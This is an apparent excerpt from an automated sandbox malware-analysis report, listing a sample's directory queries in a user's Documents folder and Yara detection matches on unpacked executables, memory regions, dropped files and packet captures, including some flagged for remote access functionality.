Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: C:\Users\user\Documents\IPKGELNTQY
Source: C:\Users\user\AppData\Local\Temp\1001226001\26e226f915.exe Directory queried: number of queries: 1474
Source: Yara match File source: 13.3.26e226f915.exe.169ed50.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.3.26e226f915.exe.169ed50.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3198150791.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3173301010.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.3141191649.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3219630830.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3178327332.000000000101F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3239956921.0000000001028000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.3047169433.00000000016B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 4020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 6764, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000E.00000003.3097542418.000000000135F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 90bef5afae.exe PID: 5204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 7160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 4020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 26e226f915.exe PID: 6764, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 39.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.9NWW1UIUAOJA8NFOZHWEDA.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.num.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ef2532c0b1.exe.40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000002.3104366518.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.3089240746.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3013087261.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3176264555.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2972676425.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2408818591.00000000004A1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3340338956.0000000001097000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3222497122.0000000000041000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3230829652.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3113201257.000000000129E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2368421842.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.3324835217.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.3337452066.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.3322904939.0000000000181000.00000080.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9NWW1UIUAOJA8NFOZHWEDA.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ef2532c0b1.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001229001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP